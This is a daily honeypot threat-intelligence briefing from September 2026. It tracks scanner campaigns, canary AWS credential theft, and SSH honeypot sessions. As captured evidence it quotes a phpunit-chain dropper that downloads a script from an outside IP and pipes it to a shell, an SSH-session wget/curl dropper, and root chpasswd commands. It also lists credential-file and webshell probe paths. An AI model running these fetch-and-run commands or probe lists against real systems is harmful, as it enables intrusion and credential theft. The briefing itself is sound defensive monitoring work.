FLUX FLEET — INTEL BRIEFING №22
Period: 2026-09-15 07:32 – 2026-09-16 07:32 UTC (24h digest window, day 21 of operations)
Sources: 7 honeypot nodes — canary-farm-1 (EU-hot), ai-devbox-1 (EU), control-1 (Middle East), ru-edge-1 (Russia), netcup-ts + sponge-01-ts + frantech-ts (deception-only, no canaries)
Confidence: High (direct observation, 21-day baseline, every result-tag spike attributed by spot query)
The digest window runs 07:32 UTC 09-15 to 07:32 UTC 09-16. The prior briefing №21 closed at 07:34 UTC 09-15, so this window holds a ~2-minute overlap. Times below are true UTC from the raw
timestampstrings; thefleet-24hhistogram labels its buckets in EDT (UTC−4), so true UTC is label + 4 h.
BLUF
The attribution fix changed this window more than any actor did. The socket-peer build deployed fleet-wide at 12:05–12:27 UTC 09-15: after 12:30, 14,404 window rows carry zero empty clientIp, named-IP inventory jumped from 21 unique IPs in №21 to 579 fleet-side, and the count of unattributed rows fell from 91.9% to 23.4% — all residual empties predate the deploy. Two censuses previously logged as empty-IP waves now have names: ALIYUN-PROBE returned as 69.5.20.14 (Byteplus, ID; 1,506 events across 3 nodes in ~1-minute runs), and METADATA-HUNT surfaced 8.234.173.27 (Google LLC; 1,053 events on canary-farm-1 with forged Claude-SearchBot/PerplexityBot/GrokBot UAs, 7 mints and 18 rejections in a 17-second burst). OMEGA-SWEEP returned at scale: the /46 block ran four census runs on 4 nodes (94.154.46.242/.243/.247/.244; 3,048 events, 26 mints) while an empty-IP Googlebot census hit canary-farm-1 at 1,041 paths in 15 s. Credential use stayed at zero for a fourth window: 69 credentials minted to 23 collectors, none used. Mint health improved sharply — 60 failures against 71 mints (0.85:1, the lowest ratio on record) against №21's 11.6:1.
Key Judgements
- The socket-peer fix closed the attribution gap: 0 empty-
clientIprows after deploy. Every row logged from 12:30 UTC 09-15 onward carries a namedclientIpon all 7 nodes (14,404 rows; 0 empty). Window total: 15,667 of 22,144 rows named (70.8%). The 23.4% residual sits entirely before the deploy window. (High confidence — direct count onv_fullfor rows>= 2026-09-15 12:30; the empty share fell 86 → 0 within the deploy hour on control-1.) - ALIYUN-PROBE is no longer sourceless: the campaign returned as a named runner, 69.5.20.14 (Byteplus Pte. Ltd., AS150436, ID). Its UA rotation matches the №21 registration exactly (
python-requests/2.28.0,curl/7.68.0, forged and bareGooglebot/2.1, Chrome/120, Firefox/121), its 21-path/.aliyun/{config,credentials}.{bak,conf,env,js,json,old,php,txt,yaml,yml}sweep matches the registered list, and it ran near-identical ~500-event, ~400-path passes on 3 nodes (aidev 22:29, frantech 03:48, control 04:36 09-16). (High confidence — the UA set plus the 21-path/.aliyun/*list is the campaign fingerprint; first-ever named run.) - The /46 block resumed census operations with a named-IP wave plus an empty-IP mirror run. 94.154.46.242 and .243 each ran the identical 743-path template on ai-devbox-1 (1,500/1,448 events, 10 mints each); .247 ran 1,042 paths on control-1 (1,050 events, 6 mints) plus a 150-path pass on canary-farm-1; .244 ran the 150-path pass on frantech-ts. An empty-IP
Googlebot/2.1census of 1,041 paths (15 s, 6 rejects) hit canary-farm-1 at 08:51, and 150/108-path empty-IP passes ran on frantech and netcup. (High confidence — wordlist identity verified by path-set union: 743 = 743 = 743 for .242/.243, and both equal 94.154.46.248's №20 list.) - The mint→use funnel stayed closed for a fourth window, but mint health is the best measured. 71
issuedrows (flux) / 69 credentials (Tracebit) went to 23 collectors with zero AWS use; 60 upstream rejections spread across 29 IP-sensor pairs, with the largest single-IP share (18 of 37 farm failures) inside 8.234.173.27's burst. Failure ratio 0.85:1 — first sub-1:1 window since tracking began. (High confidence on the zero-use count; the pull window covers the full credential TTL.)
Active Campaigns (day 21 status)
Recurring campaigns carry ⟳ and their registry names; first-seen signatures carry ⚠ NEW. Signatures, not IPs, are the campaign identity.
⟳ OMEGA-SWEEP (forged Googlebot/2.1 config census) — hostile, /46 block return, record single-run scale
- Actors: The /46 block is back under named IPs: 94.154.46.242 (aidev 15:58, 1,500 ev/743 paths, 10 mints), 94.154.46.243 (aidev 20:50, 1,448 ev/743 paths, 10 mints), 94.154.46.247 (control 04:01–04:02 09-16, 1,050 ev/1,042 paths, 6 mints + farm 12:43, 300 ev/150 paths, 2 rejects), 94.154.46.244 (frantech 07:01, 300 ev/150 paths, 0). An unattributed mirror ran canary-farm-1 at 08:51 (1,049 ev/1,041 paths in 15 s, 6 rejects) plus 150/108-path passes on frantech (04:27) and netcup (06:19). All Omegatech LTD (US) except the empty-IP set. The /46 block is now the fleet's most active census operator and its members hold the top-4 aidev/control talker slots.
- TTPs: Unchanged template, three run shapes: the 743-path core (aidev runs — path-set identical to .248's №20 list), a 1,041–1,042-path expanded list (control, empty-IP farm), and the 150-path short list (farm/frantech/netcup passes). Mint attempts concentrated at
/.env: 26 mints in the window, 6 rejects. No Aliyun-family paths in the control run (verified: 0 matches). - Assessment: The block's named operators rotate run-for-run (.242 → .243 → .247/.244), the same rotation the registry has tracked since №16. The block now holds 46 window mints plus 20 pre-existing hoard credits; all unused. The empty-IP mirror run of the 1,041-path list suggests a second host in the same operator set outside the /46 block. Watch for a use event from any /46 credential — the block is the standing hoard leader.
⚠ ALIYUN-PROBE → NAMED: 69.5.20.14 (Byteplus) — hostile, campaign now attributed
- Actors: 69.5.20.14 (Byteplus Pte. Ltd., AS150436, ID), first-ever appearance 2026-09-15 22:29. Three runs: aidev 22:29–22:30 (513 ev/401 paths), frantech 03:48–03:49 (480 ev/390 paths), control 04:36–04:37 (513 ev/401 paths). Byteplus is ByteDance's cloud arm — rented infrastructure, not a corporate scanner.
- TTPs: The №21 fingerprint intact: 9-UA rotation (
python-requests/2.28.0,curl/7.68.0, forged + bareGooglebot/2.1, Chrome/120 ×3 OS variants, Firefox/121), 21-path/.aliyun/*credential sweep (verified exact match:config.{bak,conf,env,js,json,old,php,txt,yaml,yml}+credentials.{bak,conf,env,js,json,old,php,txt,yaml,yml}), 195 China-cloud credential paths (/aliyun.*,/alicloud.*,/oss.*,/tencent.*,/huawei*,/volc*), extension-suffix fanout, plus webshell probes (/obs.php,/oss.php,/aliyun.php—webshell-probe200s). 2 mint rejections, 0 mints. Runs 6–8 h apart on 3 nodes; aidev and control lists are byte-identical (401 = 401), frantech 390 is a subset. - Assessment: This answers №21's Gap 1: the campaign IS fleet-wide automation, and the attribution fix let us name the fourth node's operator. The wordlist grew from the 404-path list to 401–414 paths with the China-cloud census deepened (
/huawei*,/volc*additions absent from the №21 sample journeys). Thewebshell-probehits on*cloud.phppaths push this past credential collection — the template tests for planted shells too. Watch for ru-edge-1, sponge, and netcup passes.
⚠ METADATA-HUNT → NAMED RUNNER 8.234.173.27 — hostile, first named-IP burst since №20
- Actors: 8.234.173.27 (Google LLC, AS396982, US), first-ever appearance, single run on canary-farm-1 00:03–00:03:29 09-16 (1,053 events, 784 paths, 17 s).
- TTPs: 165 trap families in one run:
__aws_leak_probemarker, 108/@fsrows (vite-fs-aws-credentials-file,-etc-passwd,-proc-environ,-firebase-json), 8/mcp, 4/graphqlintrospection POSTs,.env-variant fanout, and the campaign's forged AI-crawler UA rotation now includingClaude-SearchBot/1.0,Claude-User/1.0, and aFirefox/127.17; compatible; Claude-SearchBothybrid (178 Claude-UA rows). Mint outcome: 7issued+ 18tracebit-http-errorrejections, all at/.envin the same minute — the campaign's signature burst-speed rejection pattern, now seen under a named IP. - Assessment: The empty-IP wave's tooling now runs under a GCP address, matching the F5-corroborated Vite-scan profile (CVE-2026-39364 leg:
/@fs+?raw??probes). The mint-failure share says the operator still mints at burst speed. This is the campaign's first named appearance since 136.117.52.210 (№20) — the hoarder precedent says: expect 25-mint batches from this IP or its neighbors in later windows. A second companion Google IP, 34.17.8.94 (Google LLC, IT), ran a smaller 234-event.env-variant pass (166 paths, bare Chrome/131, tarpit-loop retries, 0 mints) 2 h earlier on aidev — first-ever rows for that IP; watch for a repeat before linking it. - Empty-IP wave status: No large burst in this window. Two 9/7-row marker passes (aidev 04:27, 03:40 09-16) and the frantech 07:47 pass (767 ev/596 paths/100 UAs, 39
@fs, 0 mint outcomes) — the frantech pass carries the campaign's marker set at reduced scale. Wordlist maintenance continues.
⟳ SS-NET TOOLING — hostile, named return after 5 idle windows, wordlist now shared with a new operator
- Actors: 80.94.95.211 (SS-Net, RO) returned: aidev 00:29–00:30 (214 ev/212 paths) and ru-edge-1 02:48–02:49 (212 ev/209 paths), 1 mint rejection each. Tenth window in the campaign's history, first since №19.
- TTPs: The
.env-variant walk withfake-gitstages and the campaign's known result sequence (/.env→backend/.env→api/.env→sendgrid.env→phpinfo→admin/.env→ ...). The digest registered this journey as NEW signaturefa6433fb567c(4 IPs, 819 ev, fleet-wide) — the same 12-step shape now shared by the Byteplus runner's core. Result sequence matches the Feo Prest.175shape, as documented in №16. - Assessment: The shared wordlist set now spans three operator families (SS-Net RO, Feo Prest DE, Byteplus ID) — commodity census tooling circulating between renting actors. 9 windows of minting (4 all-time creds) and zero use.
⟳ Feo Prest census family (MSIE/Safari forgery + Android UA passes) — hostile, standing, now multi-node
- Actors: 213.209.159.175 (Feo Prest SRL, DE) ran 5 passes in the window: farm 15:24 (114 ev, MSIE-9), farm 02:34 09-16 (114 ev, Safari/125-PPC class), control 12:07 (165 ev, Firefox/3.0.8-class), control 23:33 (49 ev, Android Chrome/61, 1 mint at
/.env). Plus 1 upstream rejection per farm pass. - TTPs: Same ~112-path
.envcensus under rotating antique-browser forgeries, 1 mint or 1 reject per pass. The control 23:33 Android pass minted — the first Feo Prest cred since 09-10. - Assessment: Third consecutive window with named-IP activity (census line crossed №14, farm+control №21, now 5 passes in one window). The /24 remains a census operator with persistent minting; promotion to a hoard watch stays armed.
⟳ REGISTRY-HUNT (LeakIX l9scan) — borderline scanner, largest wave since №15
- Actors: 16 IP-sensor pairs this window, all DigitalOcean except 209.38.208.202/.248.17 (the same pair-class as №15): aidev runners 159.223.132.86, 64.226.65.160, 138.197.191.87, 209.38.248.17, 134.209.25.199, 206.189.19.19, 159.89.174.87, 64.226.65.160, 207.154.197.113; farm runners 167.71.81.114, 167.99.181.249, 68.183.180.73, 138.68.144.227, 138.68.86.32, 209.38.208.202, 142.93.143.8, 64.227.70.2. 39–82 events each, 41 ev per run typical.
- TTPs: Unchanged 12-step walk. 13
/.envmints in the window (1 per named IP; 2 on the 64.226.65.160 double-run) — the runner set now mints reliably at 1/IP. - Assessment: The named-runner rotation is now 16 IPs over 5 h (18:13–21:40) versus 6 in №21 — the pool grew, or the pool probes each node with fresh IPs per session. Borderline per registry: public leak-scanning service, mints collected, no criminal payload. 64.226.65.160 holds 3 all-time creds across two windows — the only repeat minter.
⚠ WP-LOGIN-PROBE (directory fanout, 6 IPs, both basin groups) — new shape, low volume
- Actors: 6 IPs across 5 nodes: 169.58.204.147 (Contabo FR, farm), 15.235.185.191 (OVH SG, farm), 51.178.48.203 (OVH FR, aidev), 51.75.142.41 (OVH FR, frantech+sponge), 91.134.242.90 (OVH FR, control), 43.163.81.168 (Tencent SG, control). 06:43–07:29 09-16, 2–3 events per node, no POSTs.
- TTPs: 6–7-path
wp-login.phpdirectory fanout (/wp-login.php,/wp/,/cms/,/site/,/wordpress/,/admin/,/wp-login/), 5 rotating UAs per IP (Firefox/128, Chrome/126, Edg/125, Safari/17.5-iOS, Firefox/128-Android),wp-login-probe200 on the root path, 404 on the directory variants. - Assessment: First appearance of the
/wp/-directorywp-login.phpfanout in fleet history — the WP-LOGIN-BRUTE family's distributed probe stage has a new path grammar. 20 first-seen paths, all at the same 03:31 sync-arrival mark, one node per IP. Volume is inventory-scale; promote on a return with credentials or POSTs.
⟳ MALWARE-DICT-2 (IoT dropper dictionary) — hostile, contracted but synchronized
- Actors: Unattributed (empty UA). Control-1 303 ev/95 paths, ru-edge-1 309 ev/98 paths, hourly.
- TTPs: Wordlist contracted this window: 95–98 paths vs 207–208 in №21 — the
/huhu/titanjr.*and/bins/sora.*families ran, but most of the older set did not. Byte-identical hourly timing across both nodes persists. - Assessment: The dual-node loop continues; the wordlist shrank for the first time since registration. Watch for re-expansion before calling the feed stale.
⟳ LIBREDTAIL-KIT (phpunit RCE chain) — hostile, eighth window, dropper host stable
- Actors: Unattributed,
libredtail-httpUA. 6 runs: farm 196 ev/28 POSTs (05:19 → 02:53), ru-edge 49/7 (19:18), frantech 49/7 (23:58), sponge 49/7 (05:54), netcup 4/4 (00:13), aidev 46/4 (04:14). 393 events, 55 POSTs. - TTPs: Dropper captured on all 7 POST runs:
(wget --no-check-certificate -qO- https://217.60.103.56/sh || curl -sk https://217.60.103.56/sh) | sh -s apache. All runs dropper to 217.60.103.56 — the №17 split host consolidated to one staging host. - Assessment: The bodyPreview gap closed: 129 of 195 POST bodies captured this window (the №20–№21 zero-capture streak ended — the gap item is resolved as a transient, not a feed defect). Staging host unchanged from №17. Zero mints; wants execution.
⚠ NEW: 45.148.10.5 (CREDSWEEP-sibling .env walker) — hostile, first appearance
- Actors: 45.148.10.5, first-ever rows 03:21–04:08 09-16, control-1 + netcup-ts, 112 events, ipsum-listed hosting (45.148.10.x).
- TTPs:
.env-variant census (/.env.testing,/.env.sandbox,/.env_sample,/settings/.env,/configuration/.env) plus/.git/config(fake-git200s), forged browser UAs, 1 mint rejection at/.env. - Assessment: Same /24 as CREDSWEEP's standing 45.148.10.238 (absent since №15). The block keeps a second census tooling generation. Promote to campaign on a second run.
⚠ NEW: 129.222.206.62 (SpaceX/Starlink, NG) — residential collector, 3 synchronized runs
- Actors: 129.222.206.62 (AS14593 Starlink, Nigeria), first-ever appearance 18:35 09-15. 96 events on aidev+canary-farm-1 in 3 paired runs (18:35, 21:35/21:40, 00:45/01:07).
- TTPs: Per run: 14
python-requests/2.34.2tarpit-loop events, then 2/.envGETs under forged Chrome/120. Mints: 8 of 12 attempts issued (2+2+2+2 across runs), 4 rejections — a 2-mints-per-run pattern, byte-identical timing on both nodes. - Assessment: First Starlink source in fleet history. The paired-node minting with
python-requeststarpit loops is a distinct tooling shape, not the census campaigns'. 8 creds held, 0 use. Watch for a fourth paired run.
⚠ NEW: WP-BROWSER-IMPERSONATION set (Chrome/126 + Firefox/3.0.9-class absent, antique UAs return under new IPs)
- Actors: Scattered single-IP passes under
Chrome/81.0.4044.129,Chrome/120(X11),Firefox/1.0.4,MSIE 8.0class, plus new collector 198.71.50.113 (IONOS US, Android Chrome/142, 19 ev, 1 mint at 21:01) and 67.207.85.155 (DigitalOcean US, 2 nodes, 1 mint at 18:27). - TTPs: Single-node ~12–27-path
.env-variant walks, 1 mint or 1 reject per run. The 06:45–08:16 farm cluster (8+3 empty-IP rejections plus 5 Chrome/81 mints) suggests one small operator rotating UAs per request. - Assessment: The CREDSWEEP-lineage one-pass-per-UA shape continues under fresh IPs. No wordlist linkage proven; inventory-level.
Standing actors (persistence check)
- frantech Chrome/114
/c/crawler — 5th consecutive window on frantech-ts: 360 events/360 unique random-token paths across the same 4 vanity Host headers (we-love-the.world,raw.bunnyfeet.baby,tls.bunnyfeet.baby,make-internet-safer-for-the.world). Volume flat (360 vs 430). The 151.243.11.x cluster (11 IPs, 210 events of 10–30 fetches each, same/c/shape) joined this window — first multi-IP expansion of this shape; watch. - 70.8.208.88 — our own ops probe from the deploy (7 nodes, 12:05–12:19 09-15):
/definitely-not-a-trap-deploy-check-*,/verify-plain|forged|chain|selfclaim. Benign by construction; produced the window's only 2xffPeerMismatchrows (8.8.8.8/8.8.4.4forged against real peer 70.8.208.88) — the counter works as designed. Not an actor. - Uptime-prober trio — 89.248.172.33 (135 ev, 3 nodes), 93.174.93.12 (108 ev, 3 nodes) unchanged,
/-only, benign-shape. 89.248.172.11/171.24present at 9/0 ev (6/2 nodes). 80.82.77.202 absent this window. - 45.148.10.120 (2 ev, 2 nodes) — the №22-quirk-verification scan row; unchanged.
- Absent this window: 194.180.49.37 and 91.245.74.31 (third), 80.94.95.211 was present (see SS-NET), 176.65.148.71 (third), 45.148.10.238 (fifth), 94.154.46.245/.246/.248/.249 (the .242/.243/.247/.244 set now carries the block), 136.117.52.210, 35.245.185.138, 45.67.211.147, 204.76.203.x (the Pfcloud loop sat silent — first absence since №13), NIGHTAGENT (fifth idle), XMLRPC-BRUTE (fifth silent: 0 xmlrpc events), CRUSADER-SWEEP (sixth idle), CURL-SWEEP (fifth miss, standing-paused), ENV-CENSUS-3/4 (both absent — Chrome/126.0.0.0 UA rows: 0), GCP-ACONF (fifth), 40.87.20.23 (second).
- 93.152.221.173 (Omniline BG sibling) — first appearance 22:19, 84 ev,
/+/.next/.env+/debug/.envtarpit loops, 1 mint rejection. Watch with the .9/.10/.11 sibling pool.
Canary credentials
Summary
No canary credentials were used in AWS during the window. Fleet sensors minted 69 credentials to 23 collector IPs; none reached AWS.
Mint → use funnel
| Metric | Count |
|---|---|
| Credentials minted (fleet, window) | 69 |
| Distinct collector IPs | 23 |
| Credentials used in AWS (alerts) | 0 |
| Credentials stolen, no observed AWS use in window | 69 |
Per collector (evidence for attribution prose — join each IP against ip-journey and the campaign registry):
| Theft IP | Sensor | Mints (window) | Creds used in AWS | Use IPs | Operations | Mint history (6d) |
|---|---|---|---|---|---|---|
94.154.46.242 |
ai-devbox-1 | 10 | 0 | 0 | — | 10 mints since 2026-09-15 15:58 |
94.154.46.243 |
ai-devbox-1 | 10 | 0 | 0 | — | 10 mints since 2026-09-15 20:50 |
8.234.173.27 |
canary-farm-1 | 7 | 0 | 0 | — | 7 mints since 2026-09-16 00:03 |
94.154.46.247 |
control-1 | 6 | 0 | 0 | — | 6 mints since 2026-09-16 04:01 |
129.222.206.62 |
ai-devbox-1 | 4 | 0 | 0 | — | 8 mints since 2026-09-15 18:35 |
129.222.206.62 |
canary-farm-1 | 4 | 0 | 0 | — | 8 mints since 2026-09-15 18:35 |
64.226.65.160 |
ai-devbox-1 | 2 | 0 | 0 | — | 3 mints since 2026-09-09 14:16 |
102.220.161.139 |
ai-devbox-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-15 21:00 |
134.209.25.199 |
ai-devbox-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-09 19:54 |
138.197.191.87 |
ai-devbox-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-09 14:26 |
138.68.144.227 |
canary-farm-1 | 1 | 0 | 0 | — | 3 mints since 2026-09-09 14:27 |
138.68.86.32 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-15 21:03 |
142.93.143.8 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-15 20:29 |
159.223.132.86 |
ai-devbox-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-15 18:13 |
159.89.174.87 |
ai-devbox-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-15 21:40 |
167.71.81.114 |
canary-farm-1 | 1 | 0 | 0 | — | 3 mints since 2026-09-09 22:04 |
167.99.181.249 |
canary-farm-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-09 22:02 |
198.71.50.113 |
ai-devbox-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-15 21:01 |
206.189.19.19 |
ai-devbox-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-09 22:06 |
209.38.208.202 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-15 21:40 |
209.38.248.17 |
ai-devbox-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-15 20:29 |
213.209.159.175 |
control-1 | 1 | 0 | 0 | — | 3 mints since 2026-09-10 22:43 |
67.207.85.155 |
ai-devbox-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-15 18:27 |
68.183.180.73 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-15 20:18 |
Persistent collectors with no observed AWS use (candidates for hoard/resale/untraced use — check prior briefings for named campaigns):
None: 46 mints, 2026-09-12 08:14 → 2026-09-15 10:51136.117.52.210: 26 mints, 2026-09-14 00:41 → 2026-09-14 00:4134.32.131.244: 25 mints, 2026-09-11 21:44 → 2026-09-11 21:4434.6.12.67: 25 mints, 2026-09-09 09:09 → 2026-09-09 09:0994.154.46.249: 12 mints, 2026-09-11 13:47 → 2026-09-11 13:4894.154.46.242: 10 mints, 2026-09-15 15:58 → 2026-09-15 15:5894.154.46.243: 10 mints, 2026-09-15 20:50 → 2026-09-15 20:5094.154.46.245: 10 mints, 2026-09-10 16:25 → 2026-09-10 16:2594.154.46.246: 10 mints, 2026-09-12 04:12 → 2026-09-12 04:13129.222.206.62: 8 mints, 2026-09-15 18:35 → 2026-09-15 21:408.234.173.27: 7 mints, 2026-09-16 00:03 → 2026-09-16 00:0394.154.46.247: 6 mints, 2026-09-16 04:01 → 2026-09-16 04:02136.70.175.146: 4 mints, 2026-09-12 06:33 → 2026-09-12 06:33160.177.217.115: 4 mints, 2026-09-11 21:02 → 2026-09-11 21:43167.99.79.44: 4 mints, 2026-09-11 18:18 → 2026-09-11 18:19176.65.144.71: 4 mints, 2026-09-09 21:56 → 2026-09-09 21:5680.94.95.211: 4 mints, 2026-09-09 14:34 → 2026-09-12 02:32138.68.144.227: 3 mints, 2026-09-09 14:27 → 2026-09-15 21:40142.93.129.190: 3 mints, 2026-09-09 06:26 → 2026-09-10 20:23167.71.81.114: 3 mints, 2026-09-09 22:04 → 2026-09-15 21:03213.209.159.175: 3 mints, 2026-09-10 22:43 → 2026-09-15 23:3364.226.65.160: 3 mints, 2026-09-09 14:16 → 2026-09-15 21:40
Canary-use attribution (briefing prose)
Window attribution is now near-complete: 44 of 71 issued rows map to named IPs, against 21 unique named IPs fleet-wide in №21. Named collectors by campaign: OMEGA-SWEEP /46 block (94.154.46.242 ×10, .243 ×10, .247 ×6 — the block's 26 window creds join the standing hoard), METADATA-HUNT (8.234.173.27 ×7), ALIYUN-PROBE (69.5.20.14, 0 mints, 2 rejections), REGISTRY-HUNT (11 one-per-IP mints across 10 runners), Feo Prest (.175 ×1 at control 23:33), and the first Starlink collector 129.222.206.62 (×8 across 3 runs, 4 in-window). The empty-IP None hoard grew 37 → 46 (pre-deploy rows only). The standing hoard across named collectors now exceeds 220 credentials with 2 use events ever (both 09-13's CREDENTIAL-DRAIN). The deny-first IAM posture remains the load-bearing control.
Two new named collectors minted for the first time ever: 102.220.161.139 (VPS Dedicated LLC, SI — CREDSWEEP-lineage sibling of №13's 102.220.161.87; two visits, .env directory walks, 1 mint at 21:00) and 198.71.50.113 (IONOS US, 19 ev, 1 mint at 21:01).
Fleet Observations
- Attribution fix shipped and checked (the cycle's fleet-side change). The socket-peer build (
flux/server.pymd51620bee5e21b2ce6b97876949d69abbc) went to all 7 nodes 12:05–12:27 UTC 09-15. Empty-clientIpshare: 0 rows in 14,404 after 12:30 UTC, on every node, versus 23.4% for the full window and 91.9% in №21. Named-IP inventory: 579 fleet-side vs 21 in №21. The residual pre-deploy empties (5,196 rows) stay unattributable — their IPs died with the old build. - XFF forgery counters: first non-zero fourth line, and it is our own probe. 800 requests carried
X-Forwarded-For, 1 multi-entry chain, 8 ignored-as-source, 2 mismatch rows. Both mismatches are 70.8.208.88's/verify-forgedand/verify-chainrequests from the deploy check (forged8.8.8.8/8.8.4.4headers, real peer 70.8.208.88) — the counter's design validation, not hostile attribution. Thirteenth clean window for hostile XFF forgery. - Canary economics: 71
issuedrows / 69 credentials (Tracebit) to 23 collectors, 60 upstream rejections (farm 37, aidev 17, control 5, ru-edge 1). Failure ratio 0.85:1 — the best since the 0-failure №16 window, against 11.6:1 in №21. Root causes, all attributed: 8.234.173.27's 17-second burst drove 18 farm rejects (mint-burst rate limiting per the №17 quirk); the empty-IP OMEGA mirror added 6; scattered 1–2 rejections from SS-Net, 129.222.206.62, Feo Prest, and the /46 pool's 94.154.43.164/.146 singles. All failuresaws-type at/.env-family paths. - TLS/attribution posture: farm logged 224 https events (
sso.rightabouteverything.show453 Host-header hits), aidev 566 (inference.fapthropic.com1,085), the five certless nodes 0. New Host-header noise on farm:vmi3243483.contaboserver.net(210 hits) — a Contabo hostname aimed at a Contabo-source scan; treat as Host-header injection inventory. - Result-tag spikes, all attributed: aidev
webshell-probe83 (5.9×) = 69.5.20.14's China-cloud census (36) + the /46 743-path runs (43) + singles. controlwebshell-probe48 (10.7×) = 69.5.20.14 (36) + .247 (12). frantechwebshell-probe55 (inf — 0 baseline) = 69.5.20.14 (41) + .244 (14). farmfake-git-miss26 (9.8×),vite-fs-aws-credentials-file40 (4.3×) = 8.234.173.27's single run. farmenv-production-error400 (3.1×) = the OMEGA runs plus the frantech 07:47 empty-IP census (767 ev/596 paths). controlapp-config-python20 (3.9×) = inside .247's 1,042-path run. - Fleet volume: 22,144 events in the wrapper's exact window (digest 24h table: 19,639-row-era comparability broken by the fix — per-node uniq-IP counts now include real names: 93/118/61/66/85/83/73 vs the fix-depressed №21 cells). Biggest moves: aidev +87% (the two /46 743-path runs), frantech +104% (empty-IP 07:47 census + .244 pass + 69.5.20.14), control +44% (.247 + 69.5.20.14 + Pfcloud-loop residue), sponge −64% (MALWARE-DICT-2 contracted and no census pass landed).
- Control discovery velocity, day 21: 4,795 events, 62 unique IPs, +44% over the 7-day event baseline. The unique-IP cell is no longer the ~1-row artifact of the blind-sync era: 61 named IPs on the node. Ramp series (events): 39 → 70 → 88 → 107 → 105 → 105 → 100 → 98 → 99 → 108 → 120 → blind ×3 → 51 → 52 → blind → blind → 4,254 → 3,152 → 5,378 → 4,795.
- New UA inventory (hostile-shaped): forged
Claude-SearchBot/1.0,Claude-User/1.0,ClaudeBot/1.0strings inside 8.234.173.27's rotation — the campaign's crawler-forgery set now includes Anthropic-branded UAs, a first. Benign: Censys 47, zgrab 65, OAI-SearchBot 123, Palo Alto 25, Modat 16.
SSH/telnet honeypot (frantech-ts — single sensor, not fleet-wide)
- New commands: 6 of 51 distinct (my count against the full hp history; the digest's day-file window reports 0 of 51 — the day-file boundary differs from the digest window by ~7 h). All 6 are password-change commands, four of them
chpasswdwith fresh 12-char values: 120.48.90.166 (echo "root:VssceeYV4TRu"|chpasswd|bash, hour 0), 202.105.188.66 (root:kvX2mCjZL79p, hour 3), 36.111.40.138 (root:9DY1tpGmRnVS, hour 3), 113.240.110.90 (root:LENgPanEIkgX+deploy:LKRU4G1v7gNGpasswd, hour 4, 24 commands total). One genuinely new dropper command: 94.154.43.69 (root, hour 5) rancd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://213.232.114.14/nokillbins/handshakebins.sh; curl -o handshakebins.sh http://213.232.114.14/nokillbins/...— the first appearance of the/nokillbins/path; the base URL 213.232.114.14/handshakebins.sh ran on 09-12/14/15. - The /46 block ran a hands-on session on the ssh honeypot. 94.154.43.69 (Storm Industries, NL — the same /46 pool that feeds OMEGA-SWEEP's mints) logged in as
rootwith passwordPassword(4 accepted logins) and pulled the dropper twice. First post-auth activity from the /46 block anywhere in the dataset; the pool is not census-only. - Password-reset loop: 4 IPs ran
passwd/chpasswdin this window (7 rows) plus the 09-15 file's 8 IPs (117.50.73.90 ×4, 171.220.244.134 ×8, 58.209.234.84 ×8 inside the overlap segment) — the persistence-automation pattern №21 named continues at lower per-IP volume. - Funnel (digest numbers): 482 sources sent credentials → 370 got a shell (77%) → 169 ran a command (46% of shell-getters, 35% of sources). Event level: 46,009 attempts → 18,930 accepted logins → 12,724 commands (67% of accepted logins run something). Per-login conversion rose from 57% (№21) to 67% — more accepted logins end in operator action.
- Credentials: 28,479 distinct pairs, 0 new per the digest. Concentration unchanged:
345gs5662d34/3245gs5662d34family owns the top rows (1,388 + 1,043 + 72 + 61 across 4 usernames) — commodity noise.
Gaps / Next Collection
- 8.234.173.27 follow-up. First named METADATA-HUNT runner since №20, 7 creds + 18 rejections in one burst. If it returns with a 25-mint batch, it joins the hoarder pattern; check Tracebit use alerts for its
/.envcreds specifically next cycle. - ALIYUN-PROBE fleet completion. 69.5.20.14 hit 3 nodes; ru-edge-1, sponge-01-ts, and netcup-ts passes did not appear in this window. A pass on any of the three makes the №21 fleet-wide-automation call certain; the campaign's China-cloud census deepened (195 China-cloud paths,
huawei/volcadditions). - /46-block hands-on follow-up. 94.154.43.69's ssh-honeypot session (
root/Password→ dropper) is the block's first post-auth activity. Next cycle: check whether 213.232.114.14/nokillbins URLs appear in the flux side or on other nodes, and whether any /46 IP returns to the ssh surface. - 94.154.46.247's 1,042-path list vs the №21 1,041-path control run. One path changed. Diff the two lists next cycle to track the template's drift direction.
- 129.222.206.62 fourth paired run. Three byte-paired aidev+farm runs at ~3 h spacing; a fourth would establish schedule. Starlink residential source — watch for cross-IP rotation.
- frantech 07:47 empty-IP census identity. 767 events/596 paths/100 UAs with
@fsmarkers but zerossrf-relayrows — a METADATA-HUNT variant with a trimmed wordlist, run 2 h 45 min after the named 8.234.173.27 burst. Pull its path list and diff against the 631–633-path №20–№21 lists.
Generated on medina (headless systemd run). Digest: /data/flux-logs/reports/flux-digest-2026-09-16.md. Spot queries: flux-query.sh fleet-24h, crossnode-reuse, mint-health, mint-collectors, ip-journey (8.234.173.27, 69.5.20.14, 213.209.159.175), plus 30 ad-hoc v_full queries (attribution-fix window check, XFF mismatch detail, OMEGA wordlist union tests, ALIYUN-PROBE recurrence and path-set match, METADATA-HUNT named-runner anatomy, SS-Net journey signature, Feo Prest pass linkage, LIBREDTAIL dropper capture, new-collector profiles, hp new-command history comparison, /46-block hands-on check).